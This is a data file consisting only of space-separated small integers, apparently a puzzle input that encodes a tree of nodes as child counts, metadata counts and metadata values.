4 7 2 2 3 1 1 1 1 2 3 4 3 1 1 2 2 3 7 1 6 0 6 6 6 7 8 1 6 3 1 1 2 1 1 1 9 0 11 1 3 1 8 5 3 2 7 8 9 8 1 2 1 1 2 2 1 3 2 1 6 0 8 7 1 4 8 3 4 1 1 1 1 1 3 2 1 2 1 2 4 2 3 1 3 4 1 6 0 10 7 9 5 6 8 5 9 1 5 1 2 3 1 1 2 3 1 8 0 11 1 1 1 1 2 8 9 1 5 6 9 2 2 1 2 3 1 3 2 1 8 0 9 8 2 1 9 7 4 6 5 1 2 1 1 1 1 2 2 2 1 3 3 4 3 1 4 2 2 5 4 3 5 1 7 0 6 4 1 7 1 5 2 1 3 1 1 2 1 1 1 9 0 7 6 1 2 6 3 8 7 1 2 2 3 3 1 2 3 1 1 8 0 9 9 3 4 7 4 5 1 8 7 1 2 1 2 1 2 3 3 5 3 1 3 4 3 6 1 6 0 10 1 5 6 4 5 1 6 1 1 3 3 1 2 2 1 3 1 7 0 9 2 4 5 1 5 8 8 5 8 1 1 2 1 1 2 2 1 9 0 11 2 5 5 7 1 7 7 1 1 8 4 1 2 3 2 2 1 3 3 3 4 1 1 5 2 1 3 5 1 6 0 10 9 5 5 8 1 7 9 6 5 8 1 2 2 1 3 1 1 5 0 6 4 9 6 1 1 3 1 3 3 1 2 1 6 0 7 9 2 4 1 2 3 5 1 1 2 1 1 1 2 5 1 2 3 3 4 1 8 0 7 4 5 8 1 8 5 4 1 1 1 2 1 1 2 3 1 6 0 7 7 8 7 6 1 1 3 3 1 1 1 3 3 1 8 0 7 1 3 1 2 3 8 7 2 1 1 1 2 1 1 1 5 3 1 4 3 7 1 6 0 6 1 9 3 1 3 
5 3 2 1 1 3 1 1 8 0 6 8 6 8 6 1 5 3 1 3 2 1 3 1 2 1 7 0 6 1 8 7 2 1 5 1 1 1 1 2 2 1 5 1 3 2 4 4 1 7 2 2 4 7 2 6 2 5 3 3 6 1 5 0 7 4 1 7 5 2 4 5 1 1 2 2 1 1 9 0 10 3 1 1 5 3 5 5 4 2 2 1 1 1 2 1 3 1 2 3 1 5 0 6 2 5 9 7 1 4 3 1 1 3 1 2 4 3 1 3 2 3 6 1 7 0 9 6 4 5 3 1 4 5 9 9 1 3 3 2 1 2 1 1 5 0 10 3 5 1 3 2 7 2 1 7 9 1 2 1 3 1 1 7 0 8 1 5 3 8 1 1 6 8 3 2 2 1 2 2 1 4 3 1 2 1 4 3 4 1 7 0 6 8 2 3 5 8 1 1 1 1 1 3 1 3 1 9 0 7 6 5 1 9 9 8 8 1 3 3 1 3 1 3 1 3 1 5 0 10 8 6 3 9 1 4 5 1 5 5 1 3 1 1 1 4 1 1 5 3 6 1 5 0 11 5 2 3 6 1 5 3 5 1 4 2 2 1 2 3 1 1 6 0 6 4 6 6 1 6 2 1 2 2 1 1 2 1 7 0 10 1 8 4 2 1 8 3 9 6 2 1 1 3 1 2 2 1 4 1 1 3 2 4 3 6 1 7 0 10 2 8 6 3 4 2 4 1 9 5 3 3 2 1 3 1 2 1 8 0 8 6 7 8 6 6 3 2 1 3 1 3 3 3 1 2 2 1 6 0 8 9 9 1 2 3 1 9 1 1 1 3 3 3 2 4 3 4 4 5 3 5 1 6 5 4 3 5 1 6 0 7 7 5 8 1 1 4 8 1 2 2 2 1 2 1 6 0 7 6 4 3 1 7 1 3 3 1 1 3 3 1 1 9 0 9 1 7 8 1 2 9 1 8 7 3 2 1 3 1 1 1 1 1 3 3 3 2 3 3 5 1 9 0 9 1 9 9 3 4 1 5 7 4 3 1 3 1 3 1 1 3 2 1 5 0 8 3 8 9 4 6 1 5 2 3 1 2 3 1 1 8 0 7 1 4 7 8 6 8 3 2 3 1 1 1 3 2 1 2 4 2 5 3 3 6 1 6 0 8 8 1 6 5 6 3 5 5 3 1 1 1 3 3 1 7 0 8 8 1 9 8 4 9 8 6 2 2 1 1 3 3 1 1 6 0 10 3 4 2 3 1 1 1 3 2 7 1 1 1 1 2 2 2 1 3 5 4 4 3 7 1 6 0 7 3 1 8 7 4 5 1 2 1 1 1 2 1 1 6 0 8 6 6 7 3 5 6 4 1 2 1 2 1 3 2 1 9 0 9 2 5 4 1 2 8 6 9 1 3 3 3 1 1 3 1 1 3 3 2 5 5 3 2 3 3 7 1 5 0 6 1 5 5 1 3 1 1 3 1 3 3 1 7 0 8 8 1 1 6 7 6 8 8 2 1 2 1 1 3 1 1 9 0 10 1 3 5 6 5 5 6 1 5 1 1 1 2 1 2 2 1 1 3 3 1 2 1 5 2 4 7 7 1 6 5 3 3 5 1 9 0 7 2 2 4 4 1 8 8 1 1 2 2 3 1 3 2 3 1 5 0 8 9 6 5 9 5 9 1 8 1 3 2 1 1 1 5 0 10 4 2 3 7 8 6 8 8 2 1 1 2 3 3 1 5 4 1 3 2 3 7 1 9 0 8 7 3 1 4 9 8 1 9 1 1 1 3 3 2 1 2 1 1 5 0 8 8 9 4 4 9 5 4 1 1 1 3 2 3 1 9 0 11 1 4 6 3 4 1 9 6 3 6 5 2 3 2 1 1 3 2 1 1 2 3 2 4 2 2 4 3 7 1 7 0 7 3 2 4 4 5 1 1 1 2 3 2 1 3 2 1 6 0 6 2 1 5 4 9 7 2 3 1 1 1 1 1 6 0 6 4 4 5 1 2 1 3 2 1 3 1 2 5 2 3 4 1 1 3 3 7 1 8 0 7 7 1 6 9 6 1 9 1 2 1 2 3 1 2 1 1 6 0 7 8 4 1 2 1 3 7 1 1 3 1 1 3 1 7 0 7 4 9 1 6 1 6 7 3 1 1 1 2 1 1 2 3 2 3 1 3 5 3 6 1 8 0 7 9 1 1 6 4 8 5 3 2 3 2 3 2 2 1 1 
8 0 6 9 6 1 6 3 4 1 2 2 2 1 3 2 3 1 6 0 8 6 6 9 1 6 5 3 3 1 1 3 2 1 1 1 3 2 4 2 2 2 6 3 4 4 3 4 1 9 0 7 5 2 5 9 8 1 5 1 1 3 1 3 2 1 2 1 1 6 0 11 8 4 2 2 2 7 4 2 6 1 1 1 3 3 1 3 1 1 7 0 10 2 3 8 2 7 8 5 7 1 2 1 1 2 1 1 3 1 2 2 4 3 3 6 1 7 0 7 5 2 3 1 1 3 4 1 1 1 2 3 1 2 1 6 0 11 4 6 9 1 9 1 6 2 6 2 4 2 1 1 2 2 3 1 6 0 7 7 8 5 3 5 1 3 1 1 1 2 3 1 5 1 1 2 2 5 3 6 1 6 0 11 6 4 3 8 3 7 8 8 9 1 4 2 3 1 3 1 3 1 7 0 10 2 9 5 2 7 7 6 9 1 6 2 1 1 2 3 1 1 1 8 0 9 7 5 1 6 5 1 3 2 3 1 1 1 1 1 2 2 3 4 4 2 4 3 2 3 5 1 5 0 6 8 8 4 1 1 4 1 2 1 2 3 1 8 0 9 2 5 2 4 1 3 1 1 3 3 3 3 3 1 2 1 3 1 9 0 8 6 2 1 2 1 6 9 4 1 1 3 3 2 2 1 3 3 2 1 2 2 2 6 3 5 1 5 4 3 6 1 6 0 10 4 8 1 4 1 1 8 1 9 6 2 2 2 3 1 1 1 8 0 8 1 9 8 5 8 8 9 1 2 2 2 3 1 2 2 1 1 6 0 9 2 3 1 4 9 1 8 1 8 3 2 2 1 1 1 4 2 4 5 1 2 3 4 1 7 0 6 2 5 1 5 2 3 3 1 2 3 1 2 3 1 6 0 9 5 1 8 8 2 6 2 3 2 2 2 3 2 1 1 1 6 0 10 1 9 9 7 8 5 7 4 8 4 3 2 2 1 1 1 4 2 3 4 3 5 1 7 0 7 1 5 8 2 1 4 2 2 3 1 3 1 3 1 1 5 0 7 9 7 6 6 3 1 6 1 2 1 2 3 1 7 0 8 3 7 1 7 9 6 9 7 3 1 1 1 3 1 2 3 4 3 4 5 3 5 1 7 0 10 4 9 7 4 1 1 7 1 8 4 2 3 3 3 2 3 1 1 8 0 7 5 3 4 1 8 1 9 1 2 3 2 1 1 2 2 1 6 0 11 5 1 8 5 7 7 2 7 7 9 1 3 3 1 2 1 1 3 1 5 5 2 3 7 1 5 0 6 5 1 9 1 6 4 3 1 1 3 1 1 9 0 8 9 4 6 1 8 7 9 1 2 3 3 1 1 2 2 2 3 1 8 0 8 7 9 1 8 9 7 4 8 2 1 2 2 3 2 1 3 3 4 1 2 1 1 2 2 3 1 6 5 4 3 5 1 5 0 6 3 6 1 4 7 1 2 2 2 3 1 1 5 0 8 7 1 1 8 5 8 4 9 2 2 1 3 1 1 5 0 10 3 4 6 9 8 7 4 9 6 1 1 1 3 1 2 5 4 4 3 3 3 5 1 9 0 11 5 2 7 1 3 8 4 2 9 5 1 1 1 3 2 1 1 2 3 3 1 5 0 7 1 1 8 3 4 1 1 1 1 3 2 1 1 7 0 8 7 3 2 2 1 8 6 7 1 3 2 3 3 1 1 3 5 3 3 3 3 7 1 8 0 10 1 2 8 4 1 1 9 9 9 7 3 1 2 1 1 3 1 1 1 5 0 10 5 5 5 4 1 4 8 4 8 6 3 2 2 1 1 1 8 0 7 2 5 3 1 5 4 7 2 1 1 3 2 1 3 2 4 2 3 2 1 3 2 3 4 1 6 0 11 4 3 5 6 6 5 9 1 5 6 4 1 1 1 3 2 2 1 8 0 11 9 2 1 4 1 1 5 9 8 2 7 2 1 1 1 2 1 3 2 1 7 0 10 7 8 7 6 2 1 5 3 4 2 1 1 1 2 1 1 3 4 2 4 2 3 5 1 8 0 8 8 6 7 1 7 5 8 7 3 1 3 2 1 3 1 1 1 9 0 6 4 3 1 1 8 7 1 3 3 2 1 2 1 1 1 1 8 0 7 3 8 1 4 9 4 6 2 1 1 3 2 1 3 1 3 1 4 3 3 4 1 1 5 1 4 7 2 5 3 3 4 1 9 0 9 
5 8 4 8 8 1 7 2 1 1 3 1 1 3 3 1 1 3 1 6 0 11 1 3 3 7 5 2 6 1 4 2 5 1 1 2 1 1 3 1 8 0 6 7 6 1 7 1 7 1 1 1 3 1 2 1 2 3 5 3 2 3 5 1 9 0 7 7 2 3 4 1 1 9 1 3 3 1 3 1 1 2 3 1 5 0 7 8 6 3 2 6 1 6 2 2 3 1 1 1 8 0 9 5 3 3 1 6 4 5 5 3 1 2 2 2 2 1 3 1 4 2 4 2 2 3 5 1 9 0 7 1 8 7 1 4 2 7 3 1 2 1 2 1 2 3 2 1 7 0 8 1 3 2 8 9 4 7 3 1 3 1 1 1 2 1 1 7 0 6 2 7 8 1 9 5 3 2 1 2 2 1 3 1 4 1 2 1 3 6 1 6 0 11 1 1 1 3 6 4 8 6 5 1 5 2 1 3 1 2 2 1 8 0 8 8 2 8 3 9 4 1 5 1 1 2 2 1 1 3 3 1 8 0 7 1 3 5 1 4 1 2 3 3 2 1 2 1 1 3 3 5 4 3 1 3 3 6 1 5 0 9 2 7 8 7 2 4 1 8 1 1 3 3 2 3 1 6 0 7 5 7 2 7 2 4 1 3 2 2 3 1 1 1 8 0 7 4 8 5 1 3 2 6 3 1 2 2 3 2 3 1 1 4 3 4 5 3 7 1 6 4 4 3 5 1 7 0 6 4 4 6 1 7 1 1 2 1 1 1 3 3 1 6 0 10 1 2 8 7 5 8 7 5 4 7 3 1 3 2 1 2 1 8 0 10 6 8 1 1 1 1 2 6 5 9 2 3 2 1 1 1 2 2 5 3 1 3 3 3 5 1 8 0 10 8 2 9 7 3 1 7 4 7 1 2 3 2 2 2 2 1 2 1 5 0 11 3 6 1 8 4 3 7 1 9 4 8 1 2 3 3 3 1 7 0 11 2 4 6 3 2 6 6 3 1 7 7 3 3 1 2 1 1 3 3 3 2 3 2 3 5 1 8 0 10 7 9 5 5 8 2 9 4 1 8 1 2 3 3 1 2 2 2 1 9 0 9 8 4 8 6 1 2 6 6 6 1 1 2 1 3 1 3 1 3 1 9 0 10 6 1 7 1 9 5 5 4 3 3 2 1 1 1 1 2 1 2 2 2 5 4 3 5 3 6 1 8 0 10 3 1 1 9 7 8 8 7 1 3 2 3 3 3 1 3 1 3 1 9 0 7 9 9 6 1 8 5 8 3 3 1 1 2 1 1 3 1 1 5 0 8 1 1 7 1 1 7 3 9 1 1 3 2 1 3 2 5 4 4 3 6 4 2 1 5 3 3 4 1 7 0 8 4 3 1 5 9 1 5 2 2 2 1 3 3 1 3 1 5 0 7 1 9 6 5 1 7 6 3 1 3 2 1 1 5 0 6 5 5 9 8 6 1 2 3 1 1 3 2 3 2 5 3 6 1 6 0 9 9 2 9 9 5 7 1 1 7 2 2 2 3 2 1 1 5 0 6 5 9 3 1 6 7 2 1 2 2 1 1 8 0 7 1 3 9 1 5 9 4 1 2 2 1 3 2 2 3 3 4 1 3 1 3 3 5 1 8 0 11 2 1 9 1 7 3 1 2 9 1 1 2 2 3 1 1 1 2 2 1 8 0 11 9 1 6 5 1 6 8 3 1 3 8 3 2 1 3 1 2 3 3 1 9 0 10 8 1 1 4 1 6 9 8 9 5 2 3 1 2 2 2 3 1 1 5 5 4 1 3 3 5 1 9 0 6 6 1 3 9 6 4 3 1 2 2 3 1 2 2 3 1 9 0 6 6 1 8 8 5 5 2 1 3 3 2 1 3 3 1 1 6 0 9 5 9 8 9 6 1 7 8 1 1 1 2 2 1 1 1 3 4 4 4 3 4 1 8 0 7 8 4 9 2 2 1 7 1 2 1 1 1 2 1 2 1 6 0 10 6 7 8 1 5 3 5 1 1 9 1 1 3 1 3 3 1 9 0 8 3 1 4 7 7 8 8 3 3 3 1 3 3 1 2 1 1 1 5 3 3 3 6 4 4 4 3 6 1 9 0 8 8 6 4 2 2 1 6 6 3 1 2 2 2 1 1 1 2 1 8 0 10 5 3 7 5 1 2 4 9 4 3 1 2 3 1 2 1 1 1 1 9 0 8 7 5 1 6 1 1 1 6 
1 3 2 1 3 2 3 2 2 5 4 3 4 3 4 3 6 1 9 0 7 4 5 8 1 1 6 6 3 1 2 1 2 3 3 2 1 1 7 0 11 1 4 4 8 1 7 2 1 7 2 9 1 2 1 1 2 1 2 1 8 0 10 2 4 8 6 3 7 1 1 4 5 1 3 2 3 2 1 1 1 5 1 2 1 2 1 3 5 1 5 0 11 4 1 1 2 4 3 1 9 8 4 4 1 1 1 3 2 1 6 0 7 1 7 7 8 2 8 7 1 2 2 2 1 2 1 9 0 10 4 7 5 9 4 1 9 4 2 7 3 1 2 3 2 2 3 3 1 3 5 1 1 3 3 4 1 6 0 6 1 2 7 4 6 3 3 1 2 1 1 2 1 9 0 8 4 5 5 9 5 1 7 8 1 3 1 1 2 1 1 1 3 1 7 0 8 1 4 8 3 6 5 2 1 3 3 3 1 1 1 3 3 1 3 5 2 2 3 2 5 3 3 5 1 5 0 7 3 4 1 4 1 4 3 1 3 3 1 1 1 7 0 7 8 1 5 7 1 5 4 1 1 2 3 1 2 3 1 9 0 6 3 5 1 1 1 3 1 1 1 3 1 1 1 2 2 2 5 1 4 5 3 5 1 8 0 10 6 4 5 9 3 9 8 1 3 7 3 1 3 1 2 2 3 1 1 9 0 10 1 3 9 2 2 8 9 6 4 3 1 3 1 3 2 1 2 1 2 1 9 0 9 1 2 5 7 8 7 9 6 1 3 2 2 1 2 2 3 3 1 3 3 1 1 4 3 6 1 8 0 9 1 8 2 5 5 6 2 4 1 1 3 2 2 1 1 1 1 1 7 0 6 7 1 5 4 5 9 1 3 3 2 1 1 1 1 8 0 9 4 7 6 6 4 2 2 5 1 3 1 2 2 1 3 2 2 5 2 3 5 2 1 3 4 1 9 0 8 1 5 1 7 1 8 9 1 2 3 2 3 2 1 1 1 3 1 7 0 11 7 9 1 8 5 5 1 2 2 5 6 1 1 1 1 1 1 2 1 5 0 8 2 6 8 1 8 7 5 3 2 1 1 2 1 2 3 5 2 3 5 1 9 0 6 1 5 9 2 5 1 1 2 1 2 3 2 2 1 3 1 8 0 11 3 5 4 6 7 4 9 4 8 1 5 1 3 3 3 1 1 2 2 1 9 0 7 9 6 1 9 8 1 9 3 3 2 1 1 1 2 3 2 2 5 3 1 5 2 4 7 5 3 3 5 1 6 0 8 8 6 6 1 4 2 1 7 3 2 2 2 1 1 1 6 0 8 6 1 6 8 3 5 8 6 3 1 1 3 2 1 1 8 0 11 9 4 9 2 5 1 9 7 1 8 2 3 2 1 2 3 3 2 1 4 3 1 5 3 3 7 1 7 0 11 4 9 3 2 5 5 6 5 1 4 1 2 3 3 2 1 3 1 1 9 0 9 1 8 7 3 3 6 1 3 2 3 3 3 3 2 1 3 3 3 1 9 0 6 4 1 7 9 7 1 2 3 1 3 3 1 3 1 3 1 4 1 3 4 2 2 3 5 1 5 0 11 3 1 7 1 4 9 8 6 7 5 2 2 1 3 3 2 1 5 0 9 1 5 1 5 8 1 1 5 7 2 1 3 3 1 1 6 0 7 2 3 1 6 8 6 9 1 3 2 3 3 2 2 2 1 3 4 3 7 1 9 0 11 9 9 2 2 4 5 1 6 1 5 9 3 3 1 2 1 1 1 3 2 1 5 0 10 7 1 7 3 1 1 6 1 9 2 3 1 1 2 2 1 6 0 11 6 1 1 1 5 5 5 3 9 6 5 2 2 1 1 1 3 3 3 3 4 1 1 4 3 5 1 9 0 10 8 7 3 9 3 1 7 9 3 4 1 1 3 2 2 3 3 1 3 1 5 0 7 4 1 2 3 9 7 4 1 1 1 2 2 1 6 0 6 9 8 1 1 8 2 3 1 3 2 1 1 3 5 1 4 3 4 5 4 4 3 3 6 1 6 0 10 7 3 4 6 7 6 3 5 6 1 3 2 1 1 2 1 1 8 0 8 2 8 4 1 1 4 9 2 1 2 3 1 1 2 1 1 1 6 0 10 1 9 6 8 8 8 7 5 7 1 1 1 2 2 1 1 5 5 2 4 2 3 3 5 1 9 0 10 6 8 6 9 1 2 9 7 9 5 3 2 1 3 
3 1 1 2 1 1 8 0 9 3 7 1 1 7 6 8 5 7 3 2 1 3 3 1 1 1 1 8 0 10 4 2 6 8 3 2 6 9 1 6 2 2 1 1 1 1 2 2 1 1 5 1 5 3 4 1 7 0 11 9 2 1 9 6 6 3 4 7 1 1 2 1 2 1 3 2 3 1 5 0 6 6 9 5 1 9 9 1 2 2 3 1 1 5 0 8 1 8 8 1 3 8 8 5 1 1 3 1 1 2 5 1 1 3 4 1 9 0 9 4 1 1 2 7 5 9 7 3 1 2 1 3 3 3 3 1 2 1 8 0 9 4 6 8 9 4 1 9 6 1 2 3 1 1 2 3 2 2 1 5 0 6 9 1 5 1 9 7 3 2 3 1 1 5 3 5 1 5 3 2 3 8 6 2 5 5 3 7 1 7 0 7 5 2 7 3 1 4 8 3 1 1 2 1 3 2 1 7 0 8 6 2 7 2 7 1 9 1 1 3 2 3 2 2 1 1 5 0 9 7 3 8 1 6 1 3 4 2 1 3 3 3 1 1 3 1 1 2 3 3 3 6 1 8 0 8 1 5 4 7 7 5 4 9 1 2 2 2 1 2 2 3 1 7 0 8 8 3 7 6 6 4 6 1 3 2 1 1 3 1 1 1 8 0 9 7 5 1 1 8 2 5 8 6 2 1 1 1 1 1 1 2 3 5 3 1 5 3 3 4 1 9 0 10 8 6 6 3 8 1 6 3 7 2 1 3 1 1 1 2 2 3 1 1 8 0 8 4 3 5 6 5 1 3 6 2 2 2 3 3 1 1 3 1 5 0 8 1 1 4 9 2 7 4 1 3 1 2 1 1 3 2 2 5 3 7 1 5 0 9 1 4 8 9 5 4 5 9 1 2 1 1 1 3 1 9 0 11 4 4 5 2 1 3 3 3 5 2 2 2 2 1 2 2 3 2 1 1 1 5 0 10 7 6 8 7 6 1 1 2 3 8 1 2 2 2 2 1 5 2 5 2 4 2 3 4 1 7 0 6 4 7 6 7 1 4 2 1 1 1 2 1 2 1 7 0 7 9 1 3 8 4 2 7 3 2 1 3 3 1 3 1 6 0 7 5 5 2 4 1 7 2 1 2 3 1 1 1 5 1 4 1 3 2 3 3 6 5 5 3 4 1 6 0 8 9 4 7 8 1 2 6 2 1 1 1 2 3 2 1 8 0 8 9 1 7 9 6 2 6 5 3 2 2 2 2 1 1 1 1 8 0 11 8 1 6 3 4 7 4 8 7 3 6 3 2 3 2 2 2 1 2 4 1 3 5 3 7 1 9 0 10 3 7 9 7 9 9 3 4 3 1 1 3 1 2 3 3 3 3 1 1 8 0 10 8 7 7 1 5 7 2 7 9 4 3 1 3 1 3 1 3 1 1 5 0 9 4 4 8 9 1 2 1 8 1 2 3 3 3 1 2 3 5 2 1 4 1 3 6 1 6 0 7 8 6 8 6 9 1 8 2 3 2 1 1 1 1 7 0 9 5 2 6 8 1 6 8 5 6 2 3 3 1 1 2 1 1 5 0 6 6 1 1 5 3 1 1 1 1 2 1 4 2 2 2 3 4 3 5 1 5 0 10 9 3 7 7 9 1 6 3 1 4 1 2 1 3 2 1 7 0 10 1 4 9 6 4 5 5 5 1 5 2 2 1 2 3 2 3 1 8 0 10 4 2 1 7 9 6 9 7 1 1 2 1 1 3 2 2 1 1 3 2 5 4 3 3 5 1 9 0 8 1 8 7 1 7 1 1 2 1 1 2 1 1 2 3 3 2 1 6 0 9 5 2 5 4 7 6 4 6 1 2 3 1 1 3 2 1 5 0 10 4 1 2 5 1 6 7 3 4 1 1 3 3 1 1 3 1 3 5 5 7 1 6 5 5 5 5 3 6 1 7 0 6 9 2 4 3 1 1 2 2 2 1 3 2 1 1 9 0 8 6 7 2 7 1 7 4 3 1 3 2 3 3 1 2 1 3 1 7 0 8 4 3 8 1 9 2 6 7 1 2 2 1 1 3 1 4 1 1 3 4 2 3 4 1 9 0 11 9 9 5 3 1 3 5 4 3 3 6 2 3 2 1 1 2 1 3 1 1 5 0 9 4 8 4 7 1 4 4 8 2 1 3 1 1 3 1 9 0 11 4 3 8 1 2 9 7 7 1 8 8 2 1 2 1 2 3 2 3 2 
1 3 2 2 3 7 1 7 0 9 7 7 5 5 1 9 8 1 4 1 1 1 1 2 3 2 1 6 0 7 6 4 7 7 6 1 1 1 1 1 1 1 1 1 9 0 6 3 1 6 2 4 6 1 3 1 2 3 1 1 3 1 4 3 2 2 3 4 3 3 4 1 7 0 10 5 9 8 6 1 2 1 8 1 3 1 2 2 1 2 2 2 1 6 0 10 7 3 8 8 5 9 7 2 1 2 3 3 1 1 1 2 1 7 0 8 2 5 4 7 1 9 9 1 2 1 2 3 3 2 2 1 2 3 5 3 7 1 5 0 11 2 1 1 5 3 9 7 9 6 8 1 1 3 1 1 2 1 9 0 9 1 6 1 7 8 2 8 6 3 3 2 2 2 1 3 2 1 1 1 9 0 8 1 4 3 8 4 6 9 4 3 2 3 1 3 2 1 2 3 1 5 3 1 4 3 5 2 1 4 4 1 4 3 3 6 1 7 0 7 9 2 6 2 4 1 4 1 1 3 3 3 1 1 1 8 0 11 1 4 7 4 1 9 2 4 3 2 7 2 2 3 2 1 3 3 2 1 8 0 8 1 3 5 4 6 4 9 2 1 3 2 3 2 1 1 1 2 1 4 3 5 4 3 5 1 9 0 10 5 7 3 1 4 3 8 5 5 3 1 1 3 1 1 2 3 1 3 1 9 0 10 3 1 1 3 7 1 3 7 7 8 1 2 2 1 2 1 2 3 3 1 5 0 9 5 3 1 1 7 2 4 5 4 3 2 2 1 3 3 1 4 2 5 3 6 1 6 0 9 4 5 3 4 3 7 1 1 2 3 2 1 1 2 1 1 7 0 10 6 3 1 2 1 1 8 8 1 3 1 2 3 1 1 3 2 1 9 0 7 8 4 1 8 2 6 4 2 1 1 3 3 2 1 3 3 1 1 3 3 5 3 3 4 1 8 0 8 2 5 2 7 5 1 6 3 1 1 2 1 3 2 3 3 1 5 0 7 7 1 6 5 4 1 1 1 1 3 2 3 1 6 0 6 1 3 4 9 2 3 3 1 1 1 1 2 3 3 3 5 2 3 3 5 5 3 4 1 5 0 11 4 9 9 1 9 8 9 2 3 6 9 1 2 3 1 1 1 6 0 9 4 6 5 9 5 3 9 3 1 2 1 2 1 1 3 1 8 0 9 9 1 8 1 6 2 1 1 3 1 1 3 3 3 3 3 1 4 1 5 4 3 4 1 9 0 9 7 1 1 7 2 7 1 9 9 1 1 1 1 1 2 1 1 1 1 7 0 10 5 7 1 8 7 6 3 4 6 6 2 3 2 1 3 1 3 1 9 0 6 1 4 1 3 7 7 3 2 2 2 2 2 1 1 1 3 3 1 5 3 6 1 5 0 10 6 9 8 1 6 6 1 1 7 5 3 3 3 3 1 1 5 0 10 7 1 1 6 1 4 7 2 2 9 3 2 1 3 3 1 5 0 7 8 5 5 3 1 7 7 2 1 1 2 2 3 4 2 3 1 2 3 6 1 9 0 8 8 4 3 6 1 4 4 2 1 1 1 1 1 2 1 3 2 1 6 0 9 3 2 9 6 5 1 6 3 6 3 1 3 2 1 1 1 6 0 11 3 1 6 9 4 7 3 8 1 9 3 1 1 1 1 3 2 3 1 5 3 5 1 3 7 1 9 0 11 4 1 8 6 7 7 5 2 4 1 9 1 2 3 1 2 1 3 2 3 1 6 0 10 2 3 9 7 5 6 1 1 4 2 1 1 3 2 3 2 1 8 0 6 6 6 8 7 1 2 2 2 1 1 1 3 3 1 1 4 5 1 5 4 1 4 1 3 2 5 4 4 3 6 1 5 0 9 2 6 2 6 9 6 4 2 1 2 1 3 1 1 1 6 0 11 8 6 5 7 1 6 8 2 9 5 6 1 1 2 2 1 1 1 9 0 11 7 5 1 2 2 1 8 3 6 3 4 1 2 2 2 2 1 1 2 1 2 4 2 1 2 4 3 5 1 8 0 7 2 1 5 2 5 1 8 3 2 1 3 1 1 3 2 1 8 0 9 3 3 1 4 3 8 9 2 4 1 2 3 3 3 3 1 1 1 7 0 7 1 6 6 5 1 8 5 1 2 2 1 2 3 1 3 1 1 2 5 3 7 1 6 0 7 7 1 9 1 5 8 6 1 2 3 2 1 2 1 7 0 7 4 1 8 3 4 
1 4 2 1 1 1 2 3 3 1 7 0 7 1 6 4 8 1 8 6 2 3 1 1 3 2 1 2 3 2 2 5 5 1 3 7 1 9 0 10 1 1 8 1 9 5 3 1 9 7 3 2 2 2 2 3 1 3 1 1 7 0 10 1 2 3 2 2 8 1 7 4 8 2 1 3 1 3 1 2 1 9 0 10 6 1 3 8 8 1 8 1 1 2 2 1 2 3 3 1 1 1 1 2 5 5 3 2 1 4 1 2 3 3 8 6 6 3 5 5 3 7 1 8 0 11 9 1 4 5 7 1 9 1 2 9 3 1 1 2 2 2 1 3 3 1 7 0 10 1 3 1 3 1 3 4 7 6 8 3 2 2 1 3 2 1 1 5 0 9 6 9 6 7 2 9 1 3 2 3 2 1 1 1 1 1 5 3 2 2 2 3 7 1 9 0 7 9 4 1 4 2 9 1 1 1 3 3 3 1 3 1 1 1 6 0 9 7 1 7 7 7 7 1 7 5 1 3 1 3 3 1 1 6 0 8 1 6 9 4 1 7 5 7 3 3 1 1 2 1 1 4 5 5 1 1 2 3 7 1 7 0 8 1 8 2 3 6 1 5 8 3 1 1 1 1 3 3 1 8 0 10 6 2 4 9 6 9 1 3 1 1 2 1 1 1 3 1 3 3 1 8 0 11 2 4 7 5 1 1 8 8 1 9 2 1 2 1 3 1 3 3 3 2 1 2 2 1 1 4 3 5 1 8 0 11 8 7 4 7 3 4 1 1 4 1 1 2 3 2 2 1 2 1 2 1 8 0 8 1 1 8 5 3 9 9 5 2 1 1 2 1 2 1 1 1 8 0 6 7 2 9 1 6 3 2 1 2 2 1 1 3 2 3 3 5 2 4 3 5 1 5 0 6 1 2 3 7 1 2 1 2 1 3 3 1 6 0 7 9 1 9 6 7 8 8 1 2 1 1 1 3 1 9 0 10 1 9 7 3 7 8 1 1 4 1 1 1 2 1 2 1 1 1 3 3 5 3 4 1 1 4 6 5 2 5 4 3 5 1 6 0 8 9 4 1 7 6 9 2 7 2 2 2 2 1 3 1 9 0 8 1 8 2 6 5 1 1 9 1 1 3 1 2 2 2 1 1 1 5 0 7 2 8 5 4 1 7 5 2 3 1 3 1 3 3 1 3 3 3 7 1 9 0 11 7 8 4 8 4 9 6 6 1 7 8 2 1 2 2 1 3 1 1 1 1 7 0 7 3 9 6 2 5 1 3 2 2 1 3 2 1 1 1 7 0 6 7 1 3 6 6 9 2 2 1 1 1 3 3 3 3 2 5 1 4 2 3 7 1 8 0 10 6 4 4 7 2 1 2 1 3 8 1 2 1 3 3 2 2 1 1 8 0 7 3 4 3 9 5 1 1 3 2 3 2 1 3 3 2 1 9 0 6 9 9 1 5 1 3 2 1 2 1 1 1 1 2 3 2 2 2 2 2 5 1 3 5 1 8 0 8 9 4 2 1 2 9 9 5 1 3 3 2 1 1 2 3 1 7 0 6 1 3 4 1 7 7 1 1 2 2 1 3 3 1 8 0 11 4 9 3 9 2 1 5 1 1 6 3 2 1 1 2 2 2 3 2 1 3 4 1 2 3 6 1 9 0 10 4 4 7 4 8 7 1 9 8 4 1 1 1 3 2 3 1 2 1 1 9 0 6 6 1 3 7 3 5 2 3 3 3 1 1 2 1 3 1 6 0 8 4 2 2 1 4 3 7 6 1 1 2 1 2 3 1 2 5 2 2 3 6 1 4 2 5 4 3 4 1 5 0 10 4 1 2 9 3 5 3 4 6 5 3 2 1 1 1 1 8 0 8 5 7 1 2 5 4 3 1 3 2 3 3 1 1 1 1 1 8 0 7 1 4 9 9 8 1 2 3 3 2 1 2 3 1 3 1 4 2 5 3 4 1 6 0 11 6 5 9 7 6 8 4 4 5 2 1 2 1 3 2 1 1 1 7 0 10 3 9 1 9 1 4 1 7 9 7 1 1 3 1 1 2 3 1 9 0 11 5 1 6 6 6 1 1 9 4 8 3 2 3 2 3 1 3 1 2 3 5 2 1 2 3 4 1 6 0 11 1 3 3 4 1 9 4 8 2 5 5 1 2 3 3 2 2 1 5 0 7 6 9 8 9 8 6 1 1 1 3 2 1 1 8 0 7 1 1 2 8 7 
